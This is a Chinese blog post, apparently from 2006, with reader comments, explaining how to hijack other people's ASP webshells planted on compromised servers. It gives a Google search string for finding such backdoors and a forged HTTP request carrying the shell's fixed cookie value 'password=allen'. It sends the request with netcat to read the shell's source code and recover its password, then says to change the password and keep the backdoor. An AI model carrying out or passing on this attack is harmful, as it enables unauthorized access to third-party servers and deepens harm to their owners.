asp木马的一个漏洞和利用

思路是通过提交的COOKIE来查看木马的原代码,找出密码
看下面的代码
if trim(request.form("password"))=kiki then
response.cookies("password")="allen" <|>密码是否正确
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() <|>密码错误
response.end <|>停止运行
注意:response.cookies("password")="allen"
他没有要求SESSION认证,仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的,然后找到其密码。
还是实战一次:
1 找到一个后门,呵呵,不是我的,
在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字,你也可以换成别的,注意一定要加引号,表示不拆分字符串查询。
这样就找到了许多,呵呵,我选了一个,路径http://ip/images/globla.asp
2 在自己的计算机得到完好的COOKIE信息
我自己的木马http://ip/pic/xp.asp
用到一个工具winsock expert
登陆到自己的ASP木马,然后找到自己木马的路径,停!打开winsock expert选择监视对应的IE,然后回到IE点编辑,此时,IE显示出你的木马的原代码了,转到winsock expert 在前几行有一个用get 方法给你的木马的数据,我的是
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/pic.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
看到password=allen了么?这是ASP木马认证你是否登陆了方法。现在很简单了
把 数 据中所有的 ip 和路径改为别人的木马路径。还要将
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
中的PATH=后的值改为别人的木马路径。
我找的木马http://ip/images/globla.asp
所以我改后的数据是
GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/ima...
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
好了,保存在文本。
3 提交我们的数据
进入命令行,进入NC的目录,键入命令
nc -vv 202.202.202.202 80 >1.txt
>1.txt 表示将返回的信息保存在同目录的1.txt
一定要在CMD下键入命令,直接打开NC无法保存数据
呆会会提示连接成功,然后我门将作好的COOKIE粘贴在里面,然后按两次回车。
实际这时我门就通过了他的 验证并请求木马的原代码。
然后在同目录下1.txt就看到了木马的原代码,

<|>修改下面的kiki改为你密码
if trim(request.form("password"))=kiki then
哈哈,看到密码了,然后登陆吧,再改了密码,这个木马就是你的了。

关键词: 脚本渗透 , 漏洞

上一篇: 奶瓶(NP博士)的好文,真的很实在
下一篇: 交换机的三大传输方式以及各自不同之处

相关文章
访客评论
#1
回复 wekwen 2006-09-13, 20:12:27
04年的文章,居然你改了来用哈,不厚道
#2
回复 amxku 2006-09-13, 23:37:59
兄弟不简单啊,这里你也能找着哈哈
没有没有,只是从别人那帖过来的,昨天试了下,居然还可以,就帖上了

……
#3
回复 无名小辈 2006-09-15, 11:07:00
传说中的wekwen竟然在amxku的blog里晃悠....
#4
回复 nbnb 2006-09-15, 21:36:41
wekwen 怎么不在被DDOS的服务器中混拉
发表评论

评论内容 (必填):